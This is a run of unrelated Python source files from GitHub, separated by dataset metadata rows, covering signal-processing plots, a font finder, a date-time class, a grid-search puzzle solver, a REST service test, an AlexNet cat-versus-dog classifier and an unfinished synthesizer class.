plt.ylabel('|H(jw)| (dB)')
#plot2:
plt.subplot(2, 1, 2)
plt.semilogx(bodeW, bodePhase)
plt.grid() #add a grid to graph
plt.ylabel('angle of H(jw) (degs)')
plt.xlabel('w (rads/s)')
plt.show() #display figure
#TASK 1.3
sys3 = con.TransferFunction(num, denom)
plt.figure(figsize = (15,15))
#used _ = .... to suppress the output (function auto-plots)
_ = con.bode(sys3, w, dB = True, Hz = True, deg = True, plot = True)
plt.title('Bode plot for Task 1.3')
"""#(conMag, conPhase, conW) = con.bode(sys3, w, dB = True, Hz = True, deg = True, plot = True)
#plot1:
plt.rc('font', **font)
plt.figure(figsize = (30,30))
plt.subplot(2, 1, 1)
plt.semilogx(conW, conMag)
plt.grid() #add a grid to graph
plt.title('Bode plot for Task 1.3')
plt.ylabel('|H(jw)| (dB)')
#plot2:
plt.subplot(2, 1, 2)
plt.semilogx(conW, conPhase)
plt.grid() #add a grid to graph
plt.ylabel('angle of H(jw) (degs)')
plt.xlabel('w (Hz)')
plt.show() #display figure
"""
#TASK 2.1
#chosen as x(t)'s max w_0
fs = 2*np.pi*50000
steps = 1/fs
t = np.arange(0, 1e-2 + steps , steps)
x = np.cos(2*np.pi*100*t) + np.cos(2*np.pi*3024*t) + np.sin(2*np.pi*50000*t)
#plot:
plt.figure(figsize = (15,15))
plt.plot(t, x)
plt.grid() #add a grid to graph
plt.title('x(t) vs t')
plt.ylabel('x(t)')
plt.xlabel('t (s)')
plt.show() #display figure
#TASK 2.2: conv H(s) to z-dom
(zNum, zDenom) = sig.bilinear(num, denom, 500000)
#TASK 2.3: pass x(t) thru z-dom filter
y = sig.lfilter(zNum, zDenom, x)
#plot:
plt.figure(figsize = (15,15))
plt.plot(t, y)
plt.grid() #add a grid to graph
plt.title('y(t) vs t')
plt.ylabel('y(t)')
plt.xlabel('t (s)')
plt.show() #display figure
| SethCram/Signals-and-Systems-Code | proj10_main.py | proj10_main.py | py | 3,559 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.arange",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "numpy.arctan",
"line_number... |
2705037908 | import os
from PIL import ImageFont
def FindFonts():
fontdir = 'C:\\Windows\\Fonts'
files = os.listdir(fontdir)
fonts = dict()
for f in files:
if (f.split('.')[1] == 'ttf'):
tmp = ImageFont.truetype(os.path.join(fontdir,f),1)
if(tmp.font.style == "Regular"):
fonts[tmp.font.family]= f
return fonts | suever/Date-Stamper | FontFinder.py | FontFinder.py | py | 371 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "PIL.ImageFont.truetype",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "PIL.ImageFont",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"li... |
23268546540 | import pytz
from datetime import datetime
from datetime import timedelta
import asyncio
class DateError(Exception):
pass
class TimeError(Exception):
pass
class DateTimeError(TimeError, DateError):
pass
class DateTime:
@classmethod
async def at(cls, date, time):
self = DateTime()
await (self.init())
await (self.setDate(date))
await (self.setTime(time))
return self
@classmethod
async def utc(cls, hours = 0):
self = DateTime()
await (self.init())
t = str(datetime.utcnow().replace(tzinfo=pytz.utc))
t = t[0:t.find('.')]
await (self.setAll(t))
await (self.offset(hours = hours))
return self
@classmethod
async def fromString(cls, s):
self = DateTime()
await (self.init())
await (self.setAll(s))
return self
async def init(self):
self.__dn = [
"year",
"month",
"day",
"hour",
"minute",
"second"
]
self.__dt = {}
for n in self.__dn:
self.__dt[n] = None
async def _max(self, n):
i = self.__dn.index(n)
switcher = {
0: 9999,
1: 12,
2: -1,
3: 23,
4: 59,
5: 59
}
rm = switcher.get(i)
if (rm < 0):
dic = {
31: [1, 3, 5, 7, 8, 10, 12],
30: [4, 6, 9, 11],
28: [2],
29: []
}
if (self.__dt["year"] % 4 == 0):
dic[29].append(disc[28].pop(0))
for days, months in dic.items():
for m in months:
if (m == self.__dt["month"]):
rm = days
return rm
async def _min(self, n):
i = self.__dn.index(n)
switcher = {
0: 0,
1: 1,
2: 1,
3: 0,
4: 0,
5: 0
}
return switcher.get(i)
async def offset(self, **args):
for t, v in args.items():
t = t[:-1]
if t in self.__dn:
adder = int(v)
self.__dt[t] = int(self.__dt[t]) + adder
mi = (await self._min(t))
while True:
ma = (await self._max(t))
if (self.__dt[t] <= ma):
break
self.__dt[t] = (mi + (self.__dt[t] - ma)) - 1
dic = {}
dic[str(self.__dn[self.__dn.index(t) - 1]) + 's'] = 1
await (self.offset(**dic))
else:
raise DateTimeError("Invalid string for offset (" + str(t) + ")")
async def get(self, n):
return self.__dt[n]
async def set(self, **args):
for t, v in args.items():
if t in self.__dn:
self.__dt[t] = int(v)
else:
raise DateTimeError("Invalid string for set")
async def setAll(self, dt):
dt = str(dt).split(' ')
if (len(dt) == 2):
await (self.setDate(dt[0]))
await (self.setTime(dt[1]))
else:
raise DateTimeError("Invalid DateTime format!")
async def setDate(self, date):
date = str(date).replace(' ', '')
dp = date.split('-')
if (len(dp) == 3):
await (self.set(
year = int(dp[0]),
month = int(dp[1]),
day = int(dp[2])
))
else:
raise DateError("Invalid date passed!")
async def setTime(self, time):
time = str(time).replace(' ', '')
tp = time.split(':')
if (len(tp) == 3):
tp[0] = tp[0][0:2]
tp[1] = tp[1][0:2]
tp[2] = tp[2][0:2]
await (self.set(
hour = int(tp[0]),
minute = int(tp[1]),
second = int(tp[2])
))
else:
raise TimeError("Invalid time passed! " + str(tp))
async def _asString(self, data, l = 2):
data = str(self.__dt[str(data)])
while (len(data) < l):
data = '0' + data
return data
async def dateAsString(self):
yyyy = (await self._asString("year", 4))
mm = (await self._asString("month"))
dd = (await self._asString("day"))
return (yyyy + '-' + mm + '-' + dd)
async def timeAsString(self):
hh = (await self._asString("hour"))
mm = (await self._asString("minute"))
ss = (await self._asString("second"))
return (hh + ':' + mm + ':' + ss)
async def asString(self):
return ((await self.dateAsString()) + ' ' + (await self.timeAsString()))
async def _compare(self, other):
for i in range(0, len(self.__dn)):
c = self.__dn[i]
si = self.__dt[c]
oi = (await other.get(c))
if (si == oi):
continue
elif (si > oi):
return 0
else:
return 1
return -1
async def asRecentAs(self, other):
return ((await self._compare(other)) == -1)
async def lessRecentThan(self, other):
return ((await self._compare(other)) == 1)
async def moreRecentThan(self, other):
return ((await self._compare(other)) == 0)
| Liyara/Tracker | date_time_handler.py | date_time_handler.py | py | 4,172 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.utcnow",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "pytz.utc",
"line_number": 29,
"usage_type": "attribute"
}
] |
31298546243 | from collections import deque
def solution(board):
n = len(board)
# dir & dx,dy : 0 1 2 3 동 남 서 북
visited = [[[False for _ in range(4)] for _ in range(len(board))]
for _ in range(len(board))]
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
def canGo(x, y, d):
x2 = x + dx[d]
y2 = y + dy[d]
if 0 <= x2 < n and 0 <= y2 < n:
if board[x][y] == 0 and board[x2][y2] == 0:
return True
return False
def canChangeDir(x, y, d, nextD):
x2 = x + dx[d]
y2 = y + dy[d]
nextX2 = x + dx[nextD]
nextY2 = y + dy[nextD]
if not (0 <= x2 < n and 0 <= y2 < n):
return False
if not (0 <= nextX2 < n and 0 <= nextY2 < n):
return False
if board[nextX2][nextY2] == 1:
return False
# 동, 서
if d == 0 or d == 2:
if board[nextX2][y2] == 1:
return False
# 남, 북
else:
if board[x2][nextY2] == 1:
return False
return True
visited[0][0][0] = True
visited[dx[0]][dy[0]][2] = True
x, y, d, t = 0, 0, 0, 0
dq = deque()
dq.append((x, y, d, t))
while dq:
(x, y, d, t) = dq.popleft()
if (x == n-1 and y == n-1) or (x + dx[d] == n-1 and y + dy[d] == n-1):
return t
# x,y 기준 dir 변경! +1 or -1
for i in [-1, 1]:
nextD = (d + i) % 4
if 0 <= x + dx[nextD] < n and 0 <= y + dy[nextD] < n:
if visited[x][y][nextD] == False and canChangeDir(x, y, d, nextD):
visited[x][y][nextD] = True
dq.append((x, y, nextD, t+1))
# x2,y2 기준 dir 변경! +1 or -1
for i in [-1, 1]:
counterD = (d+2) % 4
counterX = x + dx[d]
counterY = y + dy[d]
nextD = (counterD + i) % 4
if 0 <= counterX + dx[nextD] < n and 0 <= counterY + dy[nextD] < n:
if visited[counterX][counterY][nextD] == False and canChangeDir(counterX, counterY, counterD, nextD):
visited[counterX][counterY][nextD] = True
dq.append((counterX, counterY, nextD, t+1))
# 동서남북 이동!
for i in range(4):
nextX = x + dx[i]
nextY = y + dy[i]
if 0 <= nextX < n and 0 <= nextY < n:
if visited[nextX][nextY][d] == False and canGo(nextX, nextY, d):
visited[nextX][nextY][d] = True
dq.append((nextX, nextY, d, t+1))
print(solution([[0, 0, 0, 1, 1],
[0, 0, 0, 1, 0],
[0, 1, 0, 1, 1],
[1, 1, 0, 0, 1],
[0, 0, 0, 0, 0]]))
| shwjdgh34/algorithms-python | codingTest/2020kakao/블록이동하기.py | 블록이동하기.py | py | 2,786 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 47,
"usage_type": "call"
}
] |
19815428666 | import json
import urllib.request
url = 'http://ec2-35-158-239-16.eu-central-1.compute.amazonaws.com'
post_port = 8000
tracking_port = 8001
headers = {"Content-Type":"application/json"}
packet = {'sender_name' : 'Otto Hahn',
'sender_street' : 'Veilchenweg 2324',
'sender_zip' : '12345',
'sender_city' : 'Hamburg',
'receiver_name' : 'Lise Meitner',
'receiver_street' : 'Amselstraße 7',
'receiver_zip' : '01234',
'receiver_city' : 'Berlin',
'size' : 'big',
'weight' : '200'}
def registerPacket():
registerRequest = urllib.request.Request(url + ':' + str(post_port) + '/register',
data=json.dumps(packet).encode('utf8'),
headers = {"Content-Type":"application/json"})
try:
response = urllib.request.urlopen(registerRequest)
responseJson = json.loads(response.read().decode('utf8'))
print('Register completed.')
return responseJson
except:
print('Register went wrong')
exit(0)
def trackPacket(packet_id):
trackingRequest = urllib.request.Request(url + ':' + str(tracking_port) + '/packetStatus/' + packet_id,
headers = {"Content-Type":"application/json"})
try:
response = urllib.request.urlopen(trackingRequest)
responseJson = json.loads(response.read().decode('utf8'))
print('Tracking completed.')
return responseJson
except Exception as e:
print('Tracking went wrong')
exit(0)
if __name__ == '__main__':
packet_id = registerPacket()['packet_id']
trackPacket(packet_id)
| CodingCamp2017/pakete | services/tests/test_rest_tracking_service.py | test_rest_tracking_service.py | py | 1,711 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "urllib.request.request.Request",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 21,
"usage_type": "name"
},
{
"api_nam... |
28912430156 | #The code looks to distinguish between cats and dogs using the AlexNet model set up
#This model does not work at high percentage of correctness over 20 epochs due to underfitting as AlexNet is set up to work over larger datasets
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn import model_selection
from sklearn.metrics import accuracy_score
from collections import Counter
import keras
from keras.models import Sequential
from keras.layers import Dense, Conv2D
from keras.layers import Activation, MaxPooling2D, Dropout, Flatten, Reshape
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def categorical_to_numpy(labels_in):
labels = []
for label in labels_in:
if label == 'dog':
labels.append(np.array([1, 0]))
else:
labels.append(np.array([0, 1]))
return np.array(labels)
def load_data():
# Run this cell to download our data into a file called 'cifar_data'
import gdown
gdown.download('https://drive.google.com/uc?id=1-BjeqccJdLiBA6PnNinmXSQ6w5BluLem','cifar_data','True'); # dogs v road;
# now load the data from our cloud computer
import pickle
data_dict = pickle.load(open( "cifar_data", "rb" ));
data = data_dict['data']
labels = data_dict['labels']
return data, labels
def plot_one_image(data, labels, img_idx):
from google.colab.patches import cv2_imshow
import cv2
import matplotlib.pyplot as plt
my_img = data[img_idx, :].squeeze().reshape([32,32,3]).copy()
my_label = labels[img_idx]
print('label: %s'%my_label)
plt.imshow(my_img)
plt.show()
def CNNClassifier(num_epochs=2, layers=1, dropout=0.15):
def create_model():
model = Sequential()
model.add(Reshape((32, 32, 3)))
for i in range(layers):
model.add(Conv2D(32, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(dropout))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(dropout))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(dropout))
model.add(Dense(2))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
return model
return KerasClassifier(build_fn=create_model, epochs=num_epochs, batch_size=10, verbose=2)
def plot_acc(history, ax = None, xlabel = 'Epoch #'):
history = history.history
history.update({'epoch':list(range(len(history['val_accuracy'])))})
history = pd.DataFrame.from_dict(history)
best_epoch = history.sort_values(by = 'val_accuracy', ascending = False).iloc[0]['epoch']
if not ax:
f, ax = plt.subplots(1,1)
sns.lineplot(x = 'epoch', y = 'val_accuracy', data = history, label = 'Validation', ax = ax)
sns.lineplot(x = 'epoch', y = 'accuracy', data = history, label = 'Training', ax = ax)
ax.axhline(0.5, linestyle = '--',color='red', label = 'Chance')
ax.axvline(x = best_epoch, linestyle = '--', color = 'green', label = 'Best Epoch')
ax.legend(loc = 1)
ax.set_ylim([0.4, 1])
ax.set_xlabel(xlabel)
ax.set_ylabel('Accuracy (Fraction)')
plt.show()
def model_to_string(model):
import re
stringlist = []
model.summary(print_fn=lambda x: stringlist.append(x))
sms = "\n".join(stringlist)
sms = re.sub('_\d\d\d','', sms)
sms = re.sub('_\d\d','', sms)
sms = re.sub('_\d','', sms)
return sms
import tensorflow as tf
import os
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from google.colab.patches import cv2_imshow
import cv2
import matplotlib.pyplot as plt
try:
road_model = model
road_saved = True
except NameError:
road_saved = False
IMG_SHAPE = 150 # Our training data consists of images with width of 150 pixels and height of 150 pixels
_URL = 'https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip'
zip_dir = tf.keras.utils.get_file('cats_and_dogs_filterted.zip', origin=_URL, extract=True)
base_dir = os.path.join(os.path.dirname(zip_dir), 'cats_and_dogs_filtered')
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
train_cats_dir = os.path.join(train_dir, 'cats') # directory with our training cat pictures
train_dogs_dir = os.path.join(train_dir, 'dogs') # directory with our training dog pictures
validation_cats_dir = os.path.join(validation_dir, 'cats') # directory with our validation cat pictures
validation_dogs_dir = os.path.join(validation_dir, 'dogs') # directory with our validation dog pictures
train_image_generator = ImageDataGenerator() # Generator for our training data
validation_image_generator = ImageDataGenerator() # Generator for our validation data
train_data = train_image_generator.flow_from_directory(batch_size=2000,
directory=train_dir,
shuffle=True,
target_size=(IMG_SHAPE,IMG_SHAPE), #(150,150)
class_mode='binary').next()
val_data = validation_image_generator.flow_from_directory(batch_size=1000,
directory=validation_dir,
shuffle=False,
target_size=(IMG_SHAPE,IMG_SHAPE), #(150,150)
class_mode='binary').next()
cd_train_inputs, cd_train_labels = train_data
cd_test_inputs, cd_test_labels = val_data
model = Sequential()
#TODO: Your AlexNet code here:
model.add(Conv2D(96, 11, strides = 3))
model.add(Activation('relu'))
model.add(Conv2D(256, 5))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Conv2D(384, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Conv2D(384, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(Conv2D(256, 3, padding = 'same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(2))
model.add(Activation('relu'))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(4096))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(128))
model.add(Activation('relu'))
model.add(Dense(2))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# Train the CNN and plot accuracy.
# Substituted new dataset names; to_categorical converts to one-hot, as ValueError suggests
history = model.fit(cd_train_inputs, to_categorical(cd_train_labels), \
validation_data=(cd_test_inputs, to_categorical(cd_test_labels)), \
epochs=70)
plot_acc(history)
print (model.summary())
| arulverma/Inspirit-AI-programs | Cat vs Dog AlexNet.py | Cat vs Dog AlexNet.py | py | 7,976 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "gdown.download",
"line_number... |
34153413716 | import datetime
def add_records(obj, db):
"""
@param obj = JSON object
@param db = SQL database
"""
entries = dict()
for o in obj.items():
if str(o[0]) != 'Name' and str(o[0]) != 'Date':
entries[int(o[0])] = o[1]
for e in entries.items():
e[1]['Event'] = str(obj['Name'])
e[1]['Date'] = datetime.date(int(obj['Date']['Year']),
int(obj['Date']['Month']),
int(obj['Date']['Day']))
e[1]['Position'] = e[0]
cursor = db.cursor()
for e in entries.items():
cursor.execute("INSERT OR IGNORE INTO entry VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
(e[1]['Hash'], e[1]['Position'], e[1]['Team Name'],
e[1]['Number'], e[1]['Class'], e[1]['Year'],
e[1]['Make'], e[1]['Model'], e[1]['Laps'],
e[1]['Best Time'], e[1]['BS Penalty Laps'],
e[1]['Black Flag Laps'], e[1]['Event'], e[1]['Date']))
db.commit()
def create_table(db):
cursor = db.cursor()
command = """
CREATE TABLE IF NOT EXISTS entry (
hash BLOB PRIMARY KEY,
position int,
team_name text,
vic_no int,
class CHAR(1),
year int,
make text,
model text,
laps int,
best_time text,
bs_laps int,
flag_laps int,
event_name text,
event_date text,
UNIQUE (hash));
"""
cursor.execute(command)
db.commit()
| segfaultmagnet/sweet-db | util/sqlloader.py | sqlloader.py | py | 1,535 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.date",
"line_number": 16,
"usage_type": "call"
}
] |
34016955487 | import torch
import torch.nn as nn
import transformers
class BertForSeqClf(nn.Module):
def __init__(self, pretrained_model_name: str, num_labels: int):
super().__init__()
config = transformers.BertConfig.from_pretrained(pretrained_model_name,
num_labels=num_labels)
self.num_labels = num_labels
self.bert = transformers.BertModel.from_pretrained(pretrained_model_name)
self.classifier = nn.Linear(config.hidden_size,
num_labels)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, input_ids: torch.LongTensor,
attention_mask: torch.LongTensor,
token_type_ids: torch.LongTensor):
outputs = self.bert(input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
return logits
| ayeffkay/Distillation | bert.py | bert.py | py | 1,092 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "transformers.BertConfig.from_pretrained",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tr... |
10322811313 | import os
import tqdm
import argparse
import pandas as pd
max_row = 0
def trans(value, dict, unknown=0):
new_value = dict.get(int(value), unknown)
if pd.isna(new_value):
new_value = unknown
return str(int(new_value))
def transform_paths(row, map_dict):
paths_ids = row['path'].split()
new_ids = []
for id in paths_ids:
new_id = trans(id, map_dict)
new_ids.append(new_id)
new_path_id = ' '.join(new_ids)
row['path'] = new_path_id
return row
def transform_paths_content(row, token_map, path_map):
row = row.split(',')
start_token_id = row[0]
path_id = row[1]
end_token_id = row[2]
new_start_token_id = trans(start_token_id, token_map)
new_path_id = trans(path_id, path_map)
new_end_token_id = trans(end_token_id, token_map)
return '{},{},{}'.format(new_start_token_id, new_path_id,
new_end_token_id)
def fill_nan(vocab_map):
global max_row
max_row = vocab_map['id_y'].max()
def apply_new_id(row):
global max_row
if pd.isna(row['id_y']):
row['id_y'] = int(max_row + 1)
max_row = row['id_y']
return row
vocab_map = vocab_map.apply(apply_new_id, axis=1)
return vocab_map
def vocab_merge(vocab_a, vocab_b, on, method):
vocab = vocab_a.merge(vocab_b, on=on, how=method)
if method == 'outer':
vocab = fill_nan(vocab)
return vocab
def save_vocab(vocab, path, columns=None):
vocab = vocab.iloc[:, 1:]
if columns is not None:
vocab.columns = columns
try:
vocab = vocab[[columns[1], columns[0]]].astype({'id': 'int32'})
except ValueError:
print(vocab)
vocab.to_csv(path, index=False)
def map2dict(vocab_map):
map_dict = {}
for i, row in vocab_map.iterrows():
if pd.isna(row[0]):
continue
map_dict[int(row[0])] = row[2]
return map_dict
def parse_args():
parser = argparse.ArgumentParser("CodePath Vocab Generation!!")
# 数据的路径
parser.add_argument('--data_path', type=str, default='/.../APathCS/github/path_data/',help="data location")
# 数据的类型
parser.add_argument('--data_name', type=str, default='example', help="dataset name")
# 语言的类型
parser.add_argument('--lang_type', type=str, default='java', help="different code type")
# 数据的分片
parser.add_argument('--train_path', type=str, default='train_i', help="train path dataset")
# 语言的类型
parser.add_argument('--test_path', type=str, default='test', help="test path dataset")
# 输出的目录
parser.add_argument('--out_path', type=str, default=' ', help="path output")
parser.add_argument("--merge_vocab", type=bool, default=False, help="need merge vocab")
return parser.parse_args()
def main():
# 配置
args = parse_args()
# /.../APathCS/github/path_data/XXX/java
lang_path = os.path.join(args.data_path, args.data_name, args.lang_type)
# 训练数据的路径
train_path = os.path.join(lang_path, args.train_path)
# 测试数据的路径
test_path = os.path.join(lang_path, args.test_path)
# 输出文件的目录
out_path = os.path.join(lang_path, args.out_path)
if not os.path.exists(out_path):
# 创建 code_path/train
os.makedirs(out_path)
# 训练集
token_vocab_train = pd.read_csv(os.path.join(train_path, 'tokens.csv'))
node_vocab_train = pd.read_csv(os.path.join(train_path, 'node_types.csv'))
path_vocab_train = pd.read_csv(os.path.join(train_path, 'paths.csv'))
# 测试集
token_vocab_test = pd.read_csv(os.path.join(test_path, 'tokens.csv'))
node_vocab_test = pd.read_csv(os.path.join(test_path, 'node_types.csv'))
path_vocab_test = pd.read_csv(os.path.join(test_path, 'paths.csv'))
need_merge = args.merge_vocab
method = 'outer' if need_merge else 'left'
node_vocab_map = vocab_merge(node_vocab_test, node_vocab_train, on=['node_type'], method=method)
token_vocab_map = vocab_merge(token_vocab_test,token_vocab_train, on=['token'], method='outer')
node_dict = map2dict(node_vocab_map)
token_dict = map2dict(token_vocab_map)
path_vocab_test = path_vocab_test.apply(lambda row: transform_paths(row, node_dict), axis=1)
path_vocab_map = vocab_merge(path_vocab_test, path_vocab_train, on=['path'], method='outer')
path_dict = map2dict(path_vocab_map)
path_context_test = []
for root, dirs, files in os.walk(test_path):
for f_name in tqdm.tqdm(files):
if 'path_contexts' in f_name:
f_path = os.path.join(root, f_name)
with open(f_path) as f:
f_list = f.readlines()
for row in f_list:
path_list = row.split()
id = path_list[0]
paths = path_list[1:]
new_paths = []
for path_item in paths:
new_path = transform_paths_content(path_item, token_dict, path_dict)
new_paths.append(new_path)
new_row = ' '.join([str(id)] + new_paths) + '\n'
path_context_test.append(new_row)
if need_merge:
path_context_train = []
for root, dirs, files in os.walk(train_path):
for f_name in tqdm.tqdm(files):
if 'path_contexts' in f_name:
f_path = os.path.join(root, f_name)
with open(f_path) as f:
f_list = f.readlines()
path_context_train = path_context_train + f_list
path_context_train = path_context_test + path_context_train
f = open(os.path.join(out_path, 'path_contexts.csv'), 'w')
f.write(''.join(path_context_train))
f.close()
save_vocab(node_vocab_map, os.path.join(out_path, 'node_types.csv'),
columns=['node_type', 'id'])
save_vocab(token_vocab_map, os.path.join(out_path, 'tokens.csv'),
columns=['token', 'id'])
save_vocab(path_vocab_map, os.path.join(out_path, 'paths.csv'),
columns=['path', 'id'])
else:
f = open(os.path.join(out_path, 'path_contexts.csv'), 'w')
f.write(''.join(path_context_test))
f.close()
save_vocab(path_vocab_map, os.path.join(train_path, 'paths.csv'),
columns=['path', 'id'])
save_vocab(token_vocab_map, os.path.join(train_path,'tokens.csv'),
columns=['token', 'id'])
if __name__ == '__main__':
main()
| miaoshenga/APathCS | scripts/share_vocab.py | share_vocab.py | py | 6,662 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pandas.isna",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.isna",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "pandas.isna",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"li... |
29050704231 | from flask.ext.wtf import Form
from wtforms import StringField, BooleanField
from wtforms.validators import DataRequired
class LoginForm(Form):
openid = StringField('openid', validators=[DataRequired()])
remember_me = BooleanField('remember_me', default=False)
def __init__(self, *args, **kwargs):
kwargs['csrf_enabled'] = False
super(LoginForm, self).__init__(*args, **kwargs)
class SearchForm(Form):
firstName = StringField('firstName')
surname = StringField('surname')
dob = StringField('dob')
identifier = StringField('identifier')
def __init__(self, *args, **kwargs):
kwargs['csrf_enabled'] = False
super(SearchForm, self).__init__(*args, **kwargs)
| AndreasThinks/ASB_DB | app/forms.py | forms.py | py | 722 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.ext.wtf.Form",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "wtforms.StringField",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "wtforms.validators.DataRequired",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "w... |
23252374328 | """Convenience functions go here"""
import discord
# region Constants
is_modified = False # Set this to True if you modify the code for your own use.
GITHUB_URL = "https://github.com/Mehehehehe82/BotInnit"
postmessage = f"It's open source, check it out on github! {GITHUB_URL}"
# endregion
# region Functions
async def prettymsg(ctx,
msg: str = "Sample text be like bruh",
Header: str = "Hey!",
RawText: str = "", # Good for mentioning people
ThumbnailURI: str = "https://cdn.discordapp.com/avatars/783773656227512331/e6db612b2f469225fda5522f3e915d7a.webp",
colorHex: int = 0xb86767
):
'''A simple embed creator with customizable defaults,'''
embed=discord.Embed(title=Header, description=msg, color=colorHex)
embed.set_thumbnail(url=ThumbnailURI)
if is_modified:
embed.set_footer(text=f"Based on the Discord bot created by hyperboid. {postmessage}")
else:
embed.set_footer(text=f"Discord bot created by hyperboid. {postmessage}")
await ctx.send(RawText, embed=embed)
# endregion
| polypoyo/DiscordBot | conv.py | conv.py | py | 999 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "discord.Embed",
"line_number": 17,
"usage_type": "call"
}
] |
13780268319 | import sys
from collections import deque
n, m = map(int, sys.stdin.readline().strip().split())
paper = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(n)]
visited = [[0 for _ in range(m)] for _ in range(n)]
max_pic = 0
pic_cnt = 0
for i in range(n):
for j in range(m):
if not visited[i][j] and paper[i][j] == 1:
q = deque([[i, j]])
visited[i][j] = 1
cnt = 0
while q:
x, y = q.popleft()
cnt += 1
for n_X, n_y in [[x - 1, y], [x + 1, y], [x, y - 1], [x, y + 1]]:
if 0<= n_X < n and 0<= n_y < m:
if visited[n_X][n_y] == 0 and paper[n_X][n_y] == 1:
visited[n_X][n_y] = 1
q.append([n_X, n_y])
max_pic = max(max_pic, cnt)
pic_cnt += 1
print(pic_cnt)
print(max_pic)
| Yangseyeon/BOJ | 03. Gold/1926.py | 1926.py | py | 922 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.stdin.readline",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readline",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"li... |
71749583783 | from z3 import substitute, Not, And
from collections import defaultdict
class Synthesizer:
def __init__(self, clauses, model, all_vars, step, prop, hist, length):
cond = hist.pc_ante[0]
self.all_clauses = set(clauses)
self.safe_clauses = set(clauses)
self.trigger_clauses = set(clauses)
self.model = model
self.prop = prop
self.all_vars = all_vars
sbst = self.get_subs_for_var_to_next_var()
self.safe_clauses.update(
Not(substitute(interp, sbst)) for interp in list(self.safe_clauses)
)
for i in range(0, step):
self.check_clauses_on_model_and_step(
self.safe_clauses, i, negate=True, cond=cond
)
self.check_clauses_on_model_and_step(
self.safe_clauses, step, negate=False, cond=cond
)
self.check_clauses_on_model_and_step(
self.trigger_clauses, step, negate=False, cond=cond
)
for i in range(step + 1, length - 1):
self.check_clauses_on_model_and_step(
self.trigger_clauses, i, negate=True, cond=cond
)
self.used_vars = defaultdict(int)
self.used_funcs = defaultdict(int)
self.used_consts = defaultdict(int)
inner_prop = self.prop.consequents[-1].children()[0].children()[0]
